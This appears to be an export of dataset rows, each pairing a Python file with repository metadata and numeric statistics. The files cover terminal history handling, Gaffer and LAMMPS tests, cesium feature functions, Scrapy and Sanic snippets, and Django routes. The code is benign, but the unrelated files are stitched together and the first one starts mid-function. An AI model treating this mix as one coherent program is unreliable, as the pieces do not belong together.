if self.lineBuffer and self.historyPosition == len(self.historyLines):
self.historyLines.append(b"".join(self.lineBuffer))
if self.historyPosition > 0:
self.handle_HOME()
self.terminal.eraseToLineEnd()
self.historyPosition -= 1
self.lineBuffer = []
self._deliverBuffer(self.historyLines[self.historyPosition])
def handle_DOWN(self):
if self.historyPosition < len(self.historyLines) - 1:
self.handle_HOME()
self.terminal.eraseToLineEnd()
self.historyPosition += 1
self.lineBuffer = []
self._deliverBuffer(self.historyLines[self.historyPosition])
else:
self.handle_HOME()
self.terminal.eraseToLineEnd()
self.historyPosition = len(self.historyLines)
self.lineBuffer = []
self.lineBufferIndex = 0
def handle_RETURN(self):
if self.lineBuffer:
self.historyLines.append(b"".join(self.lineBuffer))
self.historyPosition = len(self.historyLines)
return RecvLine.handle_RETURN(self)
| 33.576182 | 90 | 0.670613 | 1,825 | 19,172 | 6.993973 | 0.229041 | 0.086493 | 0.133344 | 0.19461 | 0.108508 | 0.070119 | 0.056644 | 0.031573 | 0.019743 | 0.019743 | 0 | 0.0038 | 0.244993 | 19,172 | 570 | 91 | 33.635088 | 0.877997 | 0.235552 | 0 | 0.182927 | 0 | 0 | 0.170467 | 0.100947 | 0 | 0 | 0 | 0 | 0.006098 | 1 | 0.240854 | false | 0.006098 | 0.021341 | 0.009146 | 0.329268 | 0.006098 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a8a153b3c58b62cde3c4b3cbce5b53100cb77e6 | 5,659 | py | Python | python/GafferTest/__init__.py | Kthulhu/gaffer | 8995d579d07231988abc92c3ac2788c15c8bc75c | [
"BSD-3-Clause"
] | 1 | 2016-07-31T09:55:09.000Z | 2016-07-31T09:55:09.000Z | python/GafferTest/__init__.py | Kthulhu/gaffer | 8995d579d07231988abc92c3ac2788c15c8bc75c | [
"BSD-3-Clause"
] | null | null | null | python/GafferTest/__init__.py | Kthulhu/gaffer | 8995d579d07231988abc92c3ac2788c15c8bc75c | [
"BSD-3-Clause"
] | null | null | null | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from _GafferTest import *
import unittest
# workaround lack of expectedFailure decorator for
# python < 2.7.
try :
expectedFailure = unittest.expectedFailure
except AttributeError :
def expectedFailure( f ) :
def wrapper( self ) :
try :
f( self )
except :
print "Expected failure"
return wrapper
from TestCase import TestCase
from AddNode import AddNode
from SphereNode import SphereNode
from SignalsTest import SignalsTest
from GraphComponentTest import GraphComponentTest
from FrameNode import FrameNode
from CachingTestNode import CachingTestNode
from NodeTest import NodeTest
from PlugTest import PlugTest
from NumericPlugTest import NumericPlugTest
from TypedPlugTest import TypedPlugTest
from ScriptNodeTest import ScriptNodeTest
from StandardSetTest import StandardSetTest
from FileSystemPathTest import FileSystemPathTest
from PathTest import PathTest
from PathFilterTest import PathFilterTest
from UndoTest import UndoTest
from SpeedTest import SpeedTest
from KeywordPlugNode import KeywordPlugNode
from CompoundNumericPlugTest import CompoundNumericPlugTest
from CompoundNumericNode import CompoundNumericNode
from CompoundPlugTest import CompoundPlugTest
from CompoundPlugNode import CompoundPlugNode
from TypedObjectPlugTest import TypedObjectPlugTest
from SplinePlugTest import SplinePlugTest
from AboutTest import AboutTest
from ChildSetTest import ChildSetTest
from PythonApplicationTest import PythonApplicationTest
from ApplicationRootTest import ApplicationRootTest
from ContextTest import ContextTest
from CompoundPathFilterTest import CompoundPathFilterTest
from BadNode import BadNode
from CapturingSlot import CapturingSlot
from LazyModuleTest import LazyModuleTest
from NodeBindingTest import NodeBindingTest
from DictPathTest import DictPathTest
from ExpressionTest import ExpressionTest
from BlockedConnectionTest import BlockedConnectionTest
from TimeWarpComputeNodeTest import TimeWarpComputeNodeTest
from TransformPlugTest import TransformPlugTest
from Transform2DPlugTest import Transform2DPlugTest
from SequencePathTest import SequencePathTest
from WeakMethodTest import WeakMethodTest
from StringInOutNode import StringInOutNode
from StringPlugTest import StringPlugTest
from ContextVariablesTest import ContextVariablesTest
from ValuePlugTest import ValuePlugTest
from RandomTest import RandomTest
from CompoundDataPlugTest import CompoundDataPlugTest
from DependencyNodeTest import DependencyNodeTest
from ComputeNodeTest import ComputeNodeTest
from BoxPlugTest import BoxPlugTest
from BoxTest import BoxTest
from OutputRedirectionTest import OutputRedirectionTest
from RecursiveChildIteratorTest import RecursiveChildIteratorTest
from FilteredRecursiveChildIteratorTest import FilteredRecursiveChildIteratorTest
from ReferenceTest import ReferenceTest
from OrphanRemoverTest import OrphanRemoverTest
from GraphComponentPathTest import GraphComponentPathTest
from ArrayPlugNode import ArrayPlugNode
from ArrayPlugTest import ArrayPlugTest
from SerialisationTest import SerialisationTest
from SwitchTest import SwitchTest
from MetadataTest import MetadataTest
from StringAlgoTest import StringAlgoTest
from NodeAlgoTest import NodeAlgoTest
from DotTest import DotTest
from ApplicationTest import ApplicationTest
from LeafPathFilterTest import LeafPathFilterTest
from MatchPatternPathFilterTest import MatchPatternPathFilterTest
from LoopTest import LoopTest
from SubGraphTest import SubGraphTest
from FileSequencePathFilterTest import FileSequencePathFilterTest
from AnimationTest import AnimationTest
from StatsApplicationTest import StatsApplicationTest
from DownstreamIteratorTest import DownstreamIteratorTest
from PerformanceMonitorTest import PerformanceMonitorTest
if __name__ == "__main__":
import unittest
unittest.main()
| 41.610294 | 81 | 0.821347 | 587 | 5,659 | 7.902896 | 0.386712 | 0.010347 | 0.006036 | 0.009916 | 0.039664 | 0.029317 | 0.029317 | 0.029317 | 0.029317 | 0.029317 | 0 | 0.004073 | 0.132356 | 5,659 | 135 | 82 | 41.918519 | 0.940733 | 0.302527 | 0 | 0.043478 | 0 | 0 | 0.006381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.869565 | null | null | 0.01087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
6a8f6d8a4a79270dbaadc3da3e9eadfe4701a899 | 5,010 | py | Python | tests/test_box.py | mjclarke94/lammps-cython | e90d4465cbf85e037b61f3f654cb6f0c3b0bee95 | [
"MIT"
] | 6 | 2018-10-10T18:13:09.000Z | 2021-03-22T11:39:57.000Z | tests/test_box.py | mjclarke94/lammps-cython | e90d4465cbf85e037b61f3f654cb6f0c3b0bee95 | [
"MIT"
] | null | null | null | tests/test_box.py | mjclarke94/lammps-cython | e90d4465cbf85e037b61f3f654cb6f0c3b0bee95 | [
"MIT"
] | 3 | 2018-08-26T14:40:00.000Z | 2019-06-07T09:39:53.000Z | from math import pi
import pytest
import numpy as np
import lammps
def test_lattice_const_to_lammps_box_cubic():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (0, 0, 0)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
def test_lattice_const_to_lammps_box_cubic_offset_origin():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (4, 3, 2)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
def test_lattice_to_lammps_box_cubic_transform():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (4, 3, 2)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
points = np.random.random((10, 3))
points_new_1 = lammps.core.transform_cartesian_vector_to_lammps_vector(points, rotation_matrix)
assert np.all(np.isclose(points, points_new_1))
points_new_2 = lammps.core.transform_cartesian_vector_to_lammps_vector(points, rotation_matrix, origin)
assert np.all(np.isclose(points + origin, points_new_2))
def test_lattice_const_to_lammps_box_rhomb():
# 3C-SiC
lengths = (3.0968, 3.0968, 3.0968)
angles = (pi/3, pi/3, pi/3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles)
assert np.all(np.isclose(bounds, ((0, 3.0968), (0, 2.6819074704396493), (0, 2.528526611816982)), atol=1e-3))
assert np.all(np.isclose(tilts, (1.5484000000000004, 1.5484000000000004, 0.8939691568132165)))
def test_lammps_box_to_lattice_const_cubic():
bounds = [[0, 5], [0, 5], [0, 5]]
tilts = (0, 0, 0)
origin = (0, 0, 0)
lengths, angles, origin = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, (5, 5, 5)))
assert np.all(np.isclose(angles, (pi/2, pi/2, pi/2)))
def test_lammps_box_orthogonal_reversible():
lengths = (4, 4, 4)
angles = (pi/2, pi/2, pi/2)
origin = (1, 2, 3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
lengths_r, angles_r, origin_r = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, lengths_r))
assert np.all(np.isclose(angles, angles_r))
assert np.all(np.isclose(origin, origin_r))
def test_lammps_box_tetrahedral_reversible():
# LiTaO3
lengths = (5.5338, 5.5338, 5.5338)
angles = (56.14486291 * pi/180, 56.14486291 * pi/180, 56.14486291 * pi/180)
origin = (1, 2, 3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
lengths_r, angles_r, origin_r = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, lengths_r))
assert np.all(np.isclose(angles, angles_r))
assert np.all(np.isclose(origin, origin_r))
def test_lammps_initial_box(lmp):
assert lmp.box.dimension == 3
assert np.all(np.isclose(lmp.box.lengths, (1., 1., 1.)))
assert np.all(np.isclose(lmp.box.angles, (pi/2., pi/2., pi/2.)))
assert np.all(np.isclose(lmp.box.bounds, [[-0.5, 0.5], [-0.5, 0.5], [-0.5, 0.5]]))
assert np.all(np.isclose(lmp.box.tilts, [0, 0, 0]))
assert np.all(np.isclose(lmp.box.lengths_angles, [[1, 1, 1], [pi/2, pi/2, pi/2]]))
# lammps has some seriously weird initial behavior
# has unit cell 1x1x1 with volume 0 ???
# actually has non-deterministic behavior 0 or inf
# assert np.isclose(lmp.box.volume, 0.)
def test_lammps_set_box_from_lattice_const(lmp):
atom_types = 5
lengths = (10, 10, 10)
angles = (pi/2., pi/2., pi/2.)
lmp.box.from_lattice_const(atom_types, lengths, angles)
assert np.all(np.isclose(lmp.box.lengths, lengths))
assert np.all(np.isclose(lmp.box.angles, angles))
assert lmp.system.total == 0
assert len(lmp.system.atom_types) == atom_types
assert np.isclose(lmp.box.volume, 10**3)
def test_lammps_update_lattice_const(lmp):
lengths = (10, 10, 10)
angles = (pi/2., pi/2., pi/2.)
lmp.box.update_lattice_const(lengths, angles)
assert np.all(np.isclose(lmp.box.lengths, lengths))
assert np.all(np.isclose(lmp.box.angles, angles))
assert np.isclose(lmp.box.volume, 10**3)
| 39.448819 | 112 | 0.67984 | 825 | 5,010 | 3.96 | 0.111515 | 0.080808 | 0.10101 | 0.119376 | 0.756657 | 0.749617 | 0.706152 | 0.668197 | 0.592287 | 0.583716 | 0 | 0.072762 | 0.166068 | 5,010 | 126 | 113 | 39.761905 | 0.709191 | 0.037325 | 0 | 0.553191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.37234 | 1 | 0.106383 | false | 0 | 0.042553 | 0 | 0.148936 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a95309d9f480004128354908a777169de1048da | 641 | py | Python | spaghetti/tests/test_api_network.py | gegen07/spaghetti | f10f9d016deeb8d4cdd63377304fc8e3b8492a0f | [
"BSD-3-Clause"
] | 182 | 2018-07-23T20:17:32.000Z | 2022-03-28T07:08:43.000Z | spaghetti/tests/test_api_network.py | gegen07/spaghetti | f10f9d016deeb8d4cdd63377304fc8e3b8492a0f | [
"BSD-3-Clause"
] | 563 | 2017-04-14T23:39:21.000Z | 2022-02-12T20:34:21.000Z | spaghetti/tests/test_api_network.py | gegen07/spaghetti | f10f9d016deeb8d4cdd63377304fc8e3b8492a0f | [
"BSD-3-Clause"
] | 51 | 2017-04-14T23:40:31.000Z | 2022-03-31T01:41:56.000Z | """ Testing for the spaghetti api import structure.
"""
import unittest
from .network_unittest_classes import TestNetwork
from .network_unittest_classes import TestNetworkPointPattern
from .network_unittest_classes import TestNetworkAnalysis
# api import structure
import spaghetti
# run tests on spaghetti.network.Network
TestNetwork.spaghetti = spaghetti
TestNetwork()
# run tests on spaghetti.network.PointPattern
TestNetworkPointPattern.spaghetti = spaghetti
TestNetworkPointPattern()
# run tests on spaghetti.analysis
TestNetworkAnalysis.spaghetti = spaghetti
TestNetworkAnalysis()
if __name__ == "__main__":
unittest.main()
| 23.740741 | 61 | 0.826833 | 66 | 641 | 7.818182 | 0.333333 | 0.063953 | 0.110465 | 0.151163 | 0.286822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112324 | 641 | 26 | 62 | 24.653846 | 0.906854 | 0.287051 | 0 | 0 | 0 | 0 | 0.017937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.384615 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
6aa9bb696576cb54c5c762feaf552f7b23cea8f0 | 1,974 | py | Python | cesium/features/common_functions.py | acrellin/cesium | 9d33edc0f9b3a79c68070826c0f390896abe294d | [
"BSD-3-Clause"
] | 603 | 2016-04-15T00:11:07.000Z | 2022-03-18T09:10:39.000Z | cesium/features/common_functions.py | acrellin/cesium | 9d33edc0f9b3a79c68070826c0f390896abe294d | [
"BSD-3-Clause"
] | 146 | 2016-03-17T19:58:24.000Z | 2022-02-05T20:36:03.000Z | cesium/features/common_functions.py | acrellin/cesium | 9d33edc0f9b3a79c68070826c0f390896abe294d | [
"BSD-3-Clause"
] | 84 | 2016-04-13T23:30:58.000Z | 2022-03-18T07:34:09.000Z | import numpy as np
from scipy import stats
def max_slope(t, x):
"""Compute the largest rate of change in the observed data."""
slopes = np.diff(x) / np.diff(t)
return np.max(np.abs(slopes))
def maximum(x):
"""Maximum observed value."""
return np.max(x)
def median(x):
"""Median of observed values."""
return np.median(x)
def median_absolute_deviation(x):
"""Median absolute deviation (from the median) of the observed values."""
return np.median(np.abs(x - np.median(x)))
def minimum(x):
"""Minimum observed value."""
return np.min(x)
def percent_beyond_1_std(x, e):
"""Percentage of values more than 1 std. dev. from the weighted average."""
dists_from_mu = x - weighted_average(x, e)
return np.mean(np.abs(dists_from_mu) > weighted_std_dev(x, e))
def percent_close_to_median(x, window_frac=0.1):
"""Percentage of values within window_frac*(max(x)-min(x)) of median."""
window = (x.max() - x.min()) * window_frac
return np.mean(np.abs(x - np.median(x)) < window)
def skew(x):
"""Skewness of a dataset. Approximately 0 for Gaussian data."""
return stats.skew(x)
def std(x):
"""Standard deviation of observed values."""
return np.std(x)
def weighted_average(x, e):
"""Arithmetic mean of observed values, weighted by measurement errors."""
return np.average(x, weights=1. / (e**2))
def weighted_average_std_err(x, e):
"""
Standard deviation of the sample weighted average of values x with
measurement errors e.
Note: this is not the same as the weighted sample standard deviation;
this value only quantifies the measurement errors, not the dispersion of
the data.
"""
return np.sqrt(1.0 / np.sum(e**2))
def weighted_std_dev(x, e):
"""Standard deviation of observed values, weighted by measurement errors."""
return np.sqrt(np.average((x - weighted_average(x, e))**2,
weights=1. / (e**2)))
| 26.675676 | 80 | 0.658055 | 305 | 1,974 | 4.17377 | 0.262295 | 0.069128 | 0.050275 | 0.051846 | 0.28751 | 0.103692 | 0.080126 | 0.080126 | 0.080126 | 0 | 0 | 0.008307 | 0.207194 | 1,974 | 73 | 81 | 27.041096 | 0.805112 | 0.412867 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.066667 | 0 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6ab1e103fbf234d369d759be37b846a948dab2da | 712 | py | Python | hacking/imgur-image-scraping-spider/pipelines.py | Dilmuratjan/MyProject | 26f4ee708eb4a7ceef780842ad737fef64a39d7e | [
"WTFPL"
] | 2 | 2017-02-19T15:11:06.000Z | 2017-02-22T18:34:10.000Z | hacking/imgur-image-scraping-spider/pipelines.py | Dilmuratjan/MyProject | 26f4ee708eb4a7ceef780842ad737fef64a39d7e | [
"WTFPL"
] | null | null | null | hacking/imgur-image-scraping-spider/pipelines.py | Dilmuratjan/MyProject | 26f4ee708eb4a7ceef780842ad737fef64a39d7e | [
"WTFPL"
] | 4 | 2017-02-26T08:10:30.000Z | 2017-05-02T10:02:03.000Z | import scrapy
from scrapy.contrib.pipeline.images import ImagesPipeline
ITEM_PIPELINES = {'imgur.pipelines.ImgurPipeline': 1}
class ImgurPipeline(ImagesPipeline):
def set_filename(self, response):
#add a regex here to check the title is valid for a filename.
return 'full/{0}.jpg'.format(response.meta['title'][0])
def get_media_requests(self, item, info):
for image_url in item['image_urls']:
yield scrapy.Request(image_url, meta={'title': item['title']})
def get_images(self, response, request, info):
for key, image, buf in super(ImgurPipeline, self).get_images(response, request, info):
key = self.set_filename(response)
yield key, image, buf
| 22.967742 | 89 | 0.703652 | 97 | 712 | 5.061856 | 0.494845 | 0.044807 | 0.077393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005137 | 0.179775 | 712 | 30 | 90 | 23.733333 | 0.835616 | 0.08427 | 0 | 0 | 0 | 0 | 0.108197 | 0.047541 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.153846 | 0.076923 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6ab427479b343856ab22ab50d8dd0460263d9bc0 | 83 | py | Python | natlutil/lemmatizer/__init__.py | alexandredias3d/natlutil | 6d6325d4dc8892c96ff4827873cb1530813c97db | [
"Apache-2.0"
] | null | null | null | natlutil/lemmatizer/__init__.py | alexandredias3d/natlutil | 6d6325d4dc8892c96ff4827873cb1530813c97db | [
"Apache-2.0"
] | 1 | 2019-06-07T02:00:43.000Z | 2019-06-07T02:00:43.000Z | natlutil/lemmatizer/__init__.py | alexandredias3d/natlang | 6d6325d4dc8892c96ff4827873cb1530813c97db | [
"Apache-2.0"
] | null | null | null | from natlutil.lemmatizer.unitexpb import *
__all__ = [
'UnitexPBDictionary'
]
| 13.833333 | 42 | 0.73494 | 7 | 83 | 8.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168675 | 83 | 5 | 43 | 16.6 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0.216867 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6ab87dc47936cd627d6ed01d824ff3d42f43ded2 | 176 | py | Python | examples/my_blueprint.py | fmux/sanicpluginsframework | 175525e85504fcf6e7d32bf12874578fc14c115a | [
"MIT"
] | 46 | 2017-10-19T00:59:07.000Z | 2020-11-16T21:16:47.000Z | examples/my_blueprint.py | fmux/sanicpluginsframework | 175525e85504fcf6e7d32bf12874578fc14c115a | [
"MIT"
] | 17 | 2017-12-25T00:27:36.000Z | 2021-03-21T14:45:20.000Z | examples/my_blueprint.py | fmux/sanicpluginsframework | 175525e85504fcf6e7d32bf12874578fc14c115a | [
"MIT"
] | 10 | 2017-12-22T03:26:16.000Z | 2020-10-19T19:16:59.000Z | from sanic import Blueprint
api_v1 = Blueprint(__name__, None)
@api_v1.middleware(attach_to="request")
async def bp_mw(request):
print("Hello bp")
__all__ = ['api_v1']
| 16 | 39 | 0.727273 | 26 | 176 | 4.423077 | 0.730769 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019868 | 0.142045 | 176 | 10 | 40 | 17.6 | 0.741722 | 0 | 0 | 0 | 0 | 0 | 0.119318 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
6ac3ffe45dd0af323c8514ef525e2a106b062de5 | 292 | py | Python | webhook/urls.py | userlocalhost/airone-1 | 8aabeabb65fd2117876380f1f69a04f0cf39889d | [
"MIT"
] | null | null | null | webhook/urls.py | userlocalhost/airone-1 | 8aabeabb65fd2117876380f1f69a04f0cf39889d | [
"MIT"
] | null | null | null | webhook/urls.py | userlocalhost/airone-1 | 8aabeabb65fd2117876380f1f69a04f0cf39889d | [
"MIT"
] | null | null | null | from django.conf.urls import url, include
from . import views
urlpatterns = [
url(r"^api/v1/", include(("webhook.api_v1.urls", "webhook.api_v1"))),
url(r"^api/v2/", include(("webhook.api_v2.urls", "webhook.api_v2"))),
url(r"^(\d+)$", views.list_webhook, name="list_webhook"),
]
| 29.2 | 73 | 0.650685 | 44 | 292 | 4.181818 | 0.386364 | 0.217391 | 0.076087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023438 | 0.123288 | 292 | 9 | 74 | 32.444444 | 0.695313 | 0 | 0 | 0 | 0 | 0 | 0.34589 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6ac87723db27b50eaf3e3b2c6575d88c16918e02 | 493 | py | Python | spider/bookinfo/items.py | leitelyaya/Broadview-analysing-sales-figures | bdff4239fd71b5077bc05703757d9f5d2610c536 | [
"Apache-2.0"
] | 5 | 2018-08-20T03:54:30.000Z | 2019-03-08T14:43:37.000Z | spider/bookinfo/items.py | leitelyaya/Broadview-analysing-sales-figures | bdff4239fd71b5077bc05703757d9f5d2610c536 | [
"Apache-2.0"
] | null | null | null | spider/bookinfo/items.py | leitelyaya/Broadview-analysing-sales-figures | bdff4239fd71b5077bc05703757d9f5d2610c536 | [
"Apache-2.0"
] | 5 | 2018-01-07T01:33:00.000Z | 2019-03-08T14:44:24.000Z | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class BookinfoItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
coverImage = scrapy.Field() #"cover.jpg",
classify = scrapy.Field() #"分类",
index = scrapy.Field() #"列表页中的排名",
pageNo = scrapy.Field() #"列表中的第几页",
content = scrapy.Field() #"html内容"
| 25.947368 | 51 | 0.636917 | 61 | 493 | 5.147541 | 0.672131 | 0.210191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002571 | 0.210953 | 493 | 18 | 52 | 27.388889 | 0.804627 | 0.505071 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6acdec1991bc193db767a67b9d8b1fe1727998d7 | 518 | py | Python | tests/r/test_pension.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | tests/r/test_pension.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | tests/r/test_pension.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.pension import pension
def test_pension():
"""Test module pension.py by downloading
pension.csv and testing shape of
extracted data has 194 rows and 19 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = pension(test_path)
try:
assert x_train.shape == (194, 19)
except:
shutil.rmtree(test_path)
raise()
| 21.583333 | 45 | 0.754826 | 72 | 518 | 5.152778 | 0.569444 | 0.080863 | 0.12938 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023529 | 0.179537 | 518 | 23 | 46 | 22.521739 | 0.849412 | 0.218147 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.066667 | false | 0 | 0.466667 | 0 | 0.533333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
